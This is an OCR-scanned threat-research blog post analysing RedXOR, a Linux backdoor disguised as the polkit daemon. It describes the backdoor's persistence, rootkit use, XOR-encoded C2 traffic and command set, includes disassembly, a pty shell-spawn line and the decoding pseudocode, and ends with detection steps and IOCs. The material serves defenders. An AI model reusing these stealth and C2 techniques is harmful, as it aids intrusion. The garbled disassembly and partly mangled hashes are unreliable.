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Get started 


e We discovered a new sophisticated backdoor targeting Linux endpoints and 
servers 


e Based on Tactics, Techniques, and Procedures (TTPs) the backdoor is believed to 
be developed by Chinese nation-state actors 


e The backdoor masquerades itself as polkit daemon. We named it Red XOR for its 
network data encoding scheme based on XOR. The malware was compiled on Red 


Hat Enterprise Linux 


e We provide recommendations for detecting and responding to this threat below 


Monitor your cloud environments for RedXOR and other Linux malware. Protect 10 
servers for free with the Intezer Protect community edition. 


Intro 
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2020 set a record for new Linux malware families. New malware families targeting 
Linux systems are being discovered on a regular basis. Backdoors attributed to advanced 
threat actors are disclosed less frequently. 


We have discovered an undocumented backdoor targeting Linux systems, masqueraded 
as polkit daemon. We named it Red XOR for its network data encoding scheme based 
on XOR. 


Based on victimology, as well as similar components and Tactics, Techniques, and 
Procedures (TTPs), we believe RedXOR was developed by high profile Chinese threat 
actors. The samples, which have low detection rates in VirusTotal, were uploaded from 
Indonesia and Taiwan, countries known to be targeted by Chinese threat actors. The 
samples are compiled with a legacy GCC compiler on an old release of Red Hat 
Enterprise Linux, hinting that RedXOR is used in targeted attacks against legacy Linux 
systems. 


During our investigation we experienced an “on and off” availability of the Command 
and Control (C2) server indicating that the operation is still active. 


Connections to Chinese Threat Actors 


We uncovered key similarities between RedXOR and previously reported malware 
associated with Winnti umbrella threat group. These malware are PWNLNX backdoor 
and XOR.DDOS and Groundhog, two botnets attributed to Winnti by BlackBerry. 


The below samples can be used for reference: 
Similarities between the samples: 


1. Use of old open-source kernel rootkits: RedXOR uses an open-source LKM 
rootkit called “Adore-ng” to hide its process. Based on a FireEye report Winnti 
used this rootkit in their “ADORE.XSE” Linux backdoor. Embedding open-source 
LKM rootkits is a common Winnti technique. The group has been documented 
using Azazel and Suterusu. 


2. The CheckLKM function name used by RedXOR has also been used in PWNLNX 
and XOR.DDOS. 


3. Provides the operator with a pseudo-terminal: RedXOR uses Python pty 
shell by importing the python pty library. PWNLNX implements the pty shell 
function in c. 
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loc_407263: 
[rbp+var_58], 1 
[rbptvar_54], 1 
cs:szShellClosed, @ 
rax, [rbp+dest] 
esi, 1088h a 
rdi, rax 3s 
bzero 
» offset aPythonCImportP ; “python -c \"import pty;pty.spawn('/bin/”... 

rax, [rbptdest 

edx, 2Fh ; ‘/" ; 
rsi, A 
rdi, rax = 


_memcpy 
rax, [rbptdest] 
rdi, rax A 
_strlen 


rdx, rax Hee 
eax, [rbptvar_23124] 


Pex, [rbpt+dest] 
rsi, ; buf 


edi, eax = fd 
_write 

rax, [rbptdest] 

esi, 10@@h z 

rdi, rax A 

_bzero 

eax, [rbp+pipedes] 

Pex, [rbp+dest] 

edx, @FFFh ; nbytes 
rsi; rcx 3 buf 
edi, eax 3 fd 
_read 

[rbpt+var_C@], eax 
[rbp+var_C@], @FFFFFFFFh 
short loc_4@731D 


Figure 1: Python pty shell used in RedXOR 


4. Encoding network with XOR: The backdoor encodes its network data with a 
scheme based on XOR. Encoding network data with XOR has been used in 
previous Winnti malware including PWNLNX. 


5. Persistence service name: As part of its persistence methods, RedXOR 
attempts to create a service under re.d. The developer added “S99” before the 
name of the service to lower its priority and make it run last on system initiation. 
This technique was used in XOR.DDOS and Groundhog samples where the 
malware developer added “S90” to the service name. 


6. Main functions flow: PWNLX and RedXOR have a main function which is in 
charge of initialization. In both backdoors, the main function calls another 
function which is in charge of the main logic. The main logic function names are 
main_process in RedXOR and MainThread in PWLNX. Both main functions 
daemonize the process to detach from the terminal and run in the background. 
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7. XML for file listing: RedXOR’s directory function and PWNLNX’s getfiles 
function are both in charge of directory listing. Their code flow implementation is 
different, however, as both malware send the directory listing as an XML file to the 
C2 server. Figure 2 shows the XML structure used in PWNLNX and RedXOR. The 
file’s data used in both functions are: path, name, type, user, permission, size, 
time. 


PWNLNX 


?xml version=\"1.0\" encoding=\"UNICODE\"?>\n<FileList FilePath=\"%s\">\n 
IST> <name> <![CDATA[ %s]]> </name> <type> %o</type> < perm> %o</perm> <user> %s: 9s</user> <size> %llu</size> <time> %s</time> </LIST>\n 
FileList> 


RedXOR 


dir=\"%s\" />\r\n 
T=\"F\" N=\"%s\" Z=\"0\" S=\"0\" P=\"2\"/>\r\n 
T=\"FA" N=\"%s\" %s P=\"1\"/>\r\n 


Figure 2: The XML structure used by PWNLNX’s getfiles function and RedXOR’s 
directory function 


8. Legacy Red Hat compilers: RedXOR and PWNLNX were both compiled with a 
Red Hat 4.4.7 compiler. This compiler is the default GCC compiler on RHEL6. 


9. Chown similarity: Both PWNLNX and RedXOR change the file’s user and group 
owner to a large ID. The same technique has been used by the XOR.DDoS malware 
as referenced in the analysis by MalwareMustDie. 


Figure 3: Similarity between PWNLNX and RedXOR of the UID and GID used 
with “Ichown” function call 


10. Overall flow and functionalities: The overall code flow, behavior, and 
capabilities of RedXOR are very similar to PWNLNX. Both have file uploading and 
downloading functionalities together with a running shell. The network tunneling 
functionality in both families is called “PortMap”. 


11. Unstripped ELF binaries: Malware developers will often tamper with a file’s 
symbols and/or sections, making it harder for researchers to analyze them. 
However, RedXOR and various Winnti malware, including PWNLNX and 
XOR.DDOS, are unstripped. 


Technical Analysis 


The samples are both unstripped 64-bit ELF files called po1kitd-update-k. Uploaded 


to VirusTotal from Taiwan and Indonesia, they are low detected at the time of this 
writing. 
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B 
1 C) One engine detected this file 
~ 0Oa76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253 
.po1kitd-update-k 
é4bits elf 
x Community |, 


Score 


Figure 4: 2bd6e2f8c1a97347b1e499e29a1d9b7¢ in VirusTotal 


Malware Installation 


Upon execution RedXOR forks off a child process allowing the parent process to exit. 
The purpose is to detach the process from the shell. The new child determines if it has 
been executed as the root user or as another user on the system. It does this to create a 
hidden folder, called “.poikitd.thumb”, inside the user’s home folder which is used to 
store files related to the malware. The malware creates a hidden file called “.poikitd- 
2a4D53” inside the folder. The file is locked to the current running process, seen in 
Figure 5, essentially creating a mutex. If another instance of the malware is executed, it 
also tries to obtain the lock but ultimately fails. Upon this failure the process exits. 
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bb11 
4188 


.imp. sprintf 
mov edi, 0 
call sym.imp.umask 
lea rax, 
mov ; 
mov k 
mov rdi, 
mov eax, 


n TA 
call sym.imp.lchown 
mov word [ hoe 
mov word [ 9 
mov qword [ 
mov qword [ 
call sym.imp.getpid 
mov dword [ ], eax 
lea rdx 
mov p 
mov : ; F_SETLK64 
mov 


-imp.fcntl 


Figure 5: The malware creates a “mutex” file locking it to the process ID 
After the malware creates the mutex, it installs itself on the infected machine. As shown 


in Figure 6, the malware looks up its current path and moves the binary to the created 
folder. It hides the file by naming it “.po1kitd-update-k”. 
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a rax, [newpath] 


ea rax, [newpath] 
r8d, str..poikitd_update_k 
y ecx, str..potkitd.thumb 
edx, obj.home are 
rsi, rbx ; const char *format 
y rdi, rax ; char *s 
/ eax, © 


lea rdx, [newpath] 

lea rax, [filename] 

mov rsi, rdx 3; const char *newpath 
mav rdi, rax ; const char *oldpath 


lea rax, [newpath] 
mov esi, 0 ; int mode 
mov rdi, rax ; const char 


test eax, eax 


lea rax, [string] 
mov esi, 
rdi, rax 


nov ebx, str.cp_s_s 
a rcx, [newpath] 
ea rdx, [filename] 
rax, [string] 
f rsi, TDX ; const char *format 
rdi, rax ; char *s 
iov eax, 0 


a rax, [string] 
ov rdi, rax ; const char *string 


tea rax, [fTttename] 
v rdi, rax ; const char *filename 


Figure 6: Malware moves the binary to the hidden folder “po1kitd.thumb” created 
earlier. It first tries to use the “rename” function provided by libc. If this fails, it 
executes an “mv” shell command via the “system” function 

After installing the binary to the hidden folder, the malware sets up persistence via “init” 
scripts. The following files are created after executing the malware on boot: 


e /usr/syno/etc/rce.d/So9poikitd-update.sh 
e /etc/init.d/poikitd-update 
e /etc/rc2.d/Sogpoi1kitd-update 


The malware checks if the rootkit is active by creating a file and removing it. Then, the 
malware compares the “saved set-user-ID” of the process to the user ID. If they don’t 
match, the rootkit is enabled. If they match, it looks to see if the user ID is “10”. If this is 
the case, the rootkit is enabled. This logic is shown in Figure 7. 
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mov ro 


; O_CREAT|O_RDWR 


_proc_poikitd 
unlink 

] 
] 
] 


-getresuid 
-getuid 
dword [ 


e81d8b 
83f80a 


b801000 


c9 
c3 


Figure 7: Logic used by RedXOR to check if the rootkit is enabled 


The “CheckLKM” logic is almost identical to the “adore_init” function in the “adore-ng” 
rootkit. Afore-ng is a Chinese open-source LKM (Loadable Kernel Module) rootkit. This 
technique allows the malware to stay under the radar by hiding its processes. The code 
for the init function is shown in Figure 8. 
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adore _t *adore_init() 
{ 
int fd; 
uid tr, e, S; 
adore_t *ret = calloc(i, sizeof(adore_t)); 


fd = open(APREFIX"/"ADORE_KEY, O_RDWR|O_CREAT, 90); 
close(fd); 

unlink (APREFIX"/"ADORE_KEY) ; 

getresuid(&r, &e, &s); 


printf ("%d, %d, %d, %d\n", CURRENT_ADORE,r,e,S); 


if (s == getuid() && getuid() != CURRENT_ADORE) { 
fprintf(stderr, 
"Failed to authorize myself. No luck, no adore?\n"); 
ret->version = -1; 
} else 
ret->version = S; 
return ret; 


Figure 8: Client authentication code for the adore-ng rootkit 


Configuration 


The malware stores the configuration encrypted within the binary. In addition to the 
Command and control (C2) IP address and port it can also be configured to use a proxy. 
The configuration includes a password, as can be seen in Figure 9. This password is used 
by the malware to authenticate to the C2 server. 
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Ofb70589 O. movzx x, word [obj.SERVER_PORT] 
66c1e808 shr ax B 

8845ee mov byte 

Ofb7057b MOVZx eax 

8845ef mov byte 

Of b65def movzx ebx 

Ofb645ee movzx eax 

b900 mov ecx, 

bae0b mov edx, 0 


89de mov 

89c7 mov , € 

e85189 call sym. 
movzx e 
movzx e 
mov ecx, 
mov edx, |o 


Mov esl 


mov 
mov 

mov edi, e 
call sym. 
movzx ebx 
movZzx eax 
mov 


ba00ba60( 

89de 

89c7 mov edi 
e8e588 call sym. 


, 


bee0b66 mov esi 


bfe0b56 ) mov edi, 


e8c5da call sym.main_process 


Figure 9: Configuration options for the malware 


The configuration values are decrypted by the “doXor” function. A pseudo-code 
representation of the function is shown in Figure 10. The decryption logic is a simple 
XOR against a byte key. The byte key is incremented by a constant for each item in the 
buffer. The only configuration value that is not encrypted is the server port. The port 
value is used to derive the key and the adder. The key is derived from bit shifting the 
port value eight steps to the right. The constant uses the port value. 


Figure 10: Decryption logic of the configuration data. The data is XORed against a key 
byte that is incremented by a constant for each entry in the buffer 
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doXor(keyChar, adder, buf, buf len) 
{ 


key = keyChar; 
for (i = 0; i < buf len; i++) { 


buf[i] = key ^ buf[il]; 
key = key + adder; 
} 


return 0; 


Communication with the C2 


The malware communicates with the C2 server over a TCP socket. The traffic is made to 
look like HTTP traffic. Figure 11 shows a pseudo-code representation of the function 
used by the malware to prepare data that is to be sent to the C2 server. First, it fills the 
buffer with null bytes. The request body is XORed against a key. The malware uses the 
buffer length as the key. This value is also passed into the function as the “total_length” 
argument. 


, data_length, total_length, command id); 


header Length 
strcpy(buf, &src, &src); 


or (i = 0; i <= data_length; i++) 


: 0 


buf[header length + i] = data[i]; 


for (i = header length; i < header length + data length; i++) 
buf[i] = data length ^ buf[il]; 
data length = data length + total length; 

} 


return data_length + header _length; 


Figure 11: Function for preparing data to be sent to the C2 server 


The same logic is used to decrypt the response body from the C2 server. From the 
response, the malware extracts “JSESSIONID”, “Content-Length”, “Total-Length” and 
the response body. The data is added to a struct with the following layout: 


oxo JSESSIONID as int 
ox8 Content-Length as long 
0x10 Total-Length as long 


0x18 Response body 
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The content length is the length of the response body but also used as the key. The total 
length value is used as a constant which is added to the key in each iteration. The 
JSESSIONID value holds the command ID for the job the C2 wants the malware to 
perform. 


Commands 


The C2 server tells the malware to execute different commands via a command code that 


is returned in the “JSESSIONID” cookie. The codes are encoded as decimal integers. A 
full list of commands supported by the analyzed malware sample are shown in the table 
below. They can be grouped into command types. Commands in the 2000 range provide 
“filesystem” interaction, 3000 handle “shell” commands, and 4000 handle network 
tunneling. 


Table 1: List of commands supported by the malware 
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Code 


0000 


0008 


0009 


1000 


1010 


2049 


2054 


2055 


2056 


2058 


2060 


2061 


2062 


2066 


3000 


3058 


3999 


4001 
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Command 


System information 


Update 


Uninstall 


Ping 


Install LKM 


List folder 


Upload file 


Open file 


Execute with system 


Remove file 


Remove folder 


Rename 


Create new folder 


Write content to file 


Start shell 


Exec shell command 


Close tty 


Portmap (Proxy) 
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4002 Kill portmap 


System Information 


When the malware first contacts the C2 server it sends a password encoded in the 
request body. The C2 server responds with the command code 0 to collect system 
information. The data collected about the system by the malware is listed in the table 
below. The data is serialized into a URL query-like string, encrypted and then sent as the 
request body. 


Table 2: Data collected by the malware and sent back to the C2 server 


URL key Description Comment 
hostip IP Hardcoded to 127.0.0.1 
softtype Hardcoded to “Linux” 


pscaddr MAC address 


hostname Machine name 


hosttar Username Possibly “host target” 
hostos Distribution Extracted from /etc/issue or /etc/redhat-release 
hostcpu Clock speed /proc/cpuinfo 


hostmem Amount of memory /proc/meminfo 


hostpack Hardcoded to “Linux” 
Ikmtag Is rootkit enabled 
kernel Kernel version Extracted from uname 


Figure 12 shows the communication between RedXOR and the C2. The malware sends 
the password “pd=admin” and C2 responds with “all right” (SSESSIONID=0000). Next, 
the malware sends the system information and the C2 replies with the ping command 
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(JSESSIONID=1000). 


POST /yester/login.jsp HTTP/1.0 
User-Agent: Mozilla/4.0 
Content-Length: 0000000008 
Total-Length: 0000000008 


Cookie: _ISESSIONID=0000 pd=admin 
Connection: Keep-Aliye 


xt#%AL]Q.HTTP/1.1 200 OK 


Set-Cookie: JSESSIONID=0000 


Content-Type: text/html 
Content-Length: 0000000009 hostip=127.0.0.1&softtype=Linux&pscaddr= 
all right 


hotal-Length:: 0000000003 a ey 


haw. xX %POST /yester/login. jsp HTTP/1.0 ME &.h osttar=root&hostos=Ubuntu 18.04.4 
a a EE LTS x86_64&hostcpu=2207&hostmem= 
Total-Length: 0000000218 pesemeeeeed L hostpack=Linux&lkmtag=0&kernel= 


Cookie: JSESSIONID=0001 ee aes x86_64 


Connection: Keep-Alive 


Set-Cookie: JSESSTONID=1000 
Content-Type: text/html 
Content-Length: 9000000000 
Total-Length: 0000000000 


POST /yester/login.jsp HTTP/1.0 
User-Agent: Mozilla/4.0 
Content-Length: 9000000000 
Total-Length: 9000000000 
Cookie: JSESSIONID=1000 
Connection: Keep-Alive 


HTTP/1.1 200 OK 

Set-Cookie: JSESSIONID=1000 
Content-Type: text/html 
Content-Length: 0000000000 
Total-Length: 0000000000 


Figure 12: RedXOR communication with C2 


Update Functionality 


The malware can be updated by the threat actor. This is performed by sending command 
code 8 to the malware. When the malware receives this code the following actions are 
taken: 


e The malware opens the mutex file for writing. 

e Itsends a request with the command code 8 and an empty request body to the C2 
server. 

e The response body from the server is written to the mutex file. The response body 
is not encrypted. 

e The lock is released on the mutex file. 

e The malware executes “chmod” to set the execution flag on the file via the libe 
system function. 
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e The malware sleeps and tries to obtain the lock on the file again when it wakes up. 
If it fails, it assumes the update was successful, closes the connection to the C2 
server and exits. 


Shell Functionality 


The malware has the ability to provide its operator with a “tty” shell. If a shell is 
requested via the command code 3000, the malware creates a new thread executing 
“/bin/sh”. In the new spawned shell, the malware executes python -c “import 
pty;pty.spawn(‘/bin/sh’)’ to get a pseudo-terminal (pty) interface. Any shell commands 
sent to the malware with the command code of 3058 are executed in the pty and the 
response is returned to the operator. 


Network Tunneling 


Network tunneling is enabled by sending the command code 4001 to the malware. As 
part of the request, a “configuration” is sent as part of the response body. The 
configuration consists of three items separated by a “#” character. The items are: a port 
to bind to, the IP to connect to, and a port to connect to. The malware uses a modified 
version of the open-source project Rinetd for the tunneling logic. Rinetd is designed to 
use a configuration file stored on the machine. To get around this, the malware author 
has modified the function that parses the configuration in order to directly take the 
required values normally found in the configuration file. 


Detection & Response 


Detect if a Machine in Your Network Has Been Compromised 


Use a Cloud Workload Protection Platform like Intezer Protect to gain full runtime 
visibility over the code in your Linux-based systems and get alerted on any malicious or 
unauthorized code or commands. 


Try our free community edition 


Figure 13 emphasizes an Intezer Protect alert on a compromised machine. The alert 
provides additional context about the malicious code including threat classification 
(RedXOR), binary’s path on the disk, process tree, command, and hash. 
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INTEZER PROTECT Dashboard Alerts Code Assets images Clusters Add Asset 


Close Alert x 


A malicious file has be 


S Asset Details File Details 


All Executions 


Running process tree 


PID: 14339 


Figure 13: Intezer Protect alerts on RedXOR 


We also recommend using the IOCs section below to ensure that the RedXOR process 
and the files it creates do not exist on your system. 


Intezer Protect defends all types of compute resources—including VMs, containers and 
Kubernetes—against the latest Linux threats in runtime. Try our free community edition 


Response 
If you are a victim of this operation, take the following steps: 


1. Kill the process and delete all files related to the malware. 


2. Make sure your machine is clean and running only trusted code using a Cloud 
Workload Protection Platform like Intezer Protect. 


Wrap Up 


Linux systems are under constant attack given that Linux runs on most of the public 
cloud workload. A survey conducted by Sophos found that 70% of organizations using 
the public cloud to host data or workloads experienced a security incident in the past 
year. 


Along with botnets and cryptominers, the Linux threat landscape is also home to 
sophisticated threats like RedXOR developed by nation-state actors. 


RedXOR samples are indexed in Intezer Analyze so that you can detect any suspicious 
file that shares code with this malware. 
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Figure 14: RedXOR sample in Intezer Analyze 


loCs 


RedXOR 
0a76c55fa88d4c134012a5136co9fbo38b4be88a382f88bf2804043253b0550f 


0423258b94e8agat58ad63ea493818618de2d8c60cf75ec7980edcaa34dccg19 


Network 
update[. ]cloudjscdn[.]com 
158[.]247[.]208[.]230 


34[.]o2[.]228[].216 


Process name 


poikitd-update-k 


File and directories created on disk 
.poikitd-update-k 

.poikitd.thumb 

.poikitd-2a4D53 

.poikitd-k3i86dfv 

.poikitd-nrkSh7d6 

.poikitd-2sAq14 


.2sAq14 
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.2a4D53 
poikitd.ko 
poikitd-update.desktop 


Sggpoikitd-update.sh 
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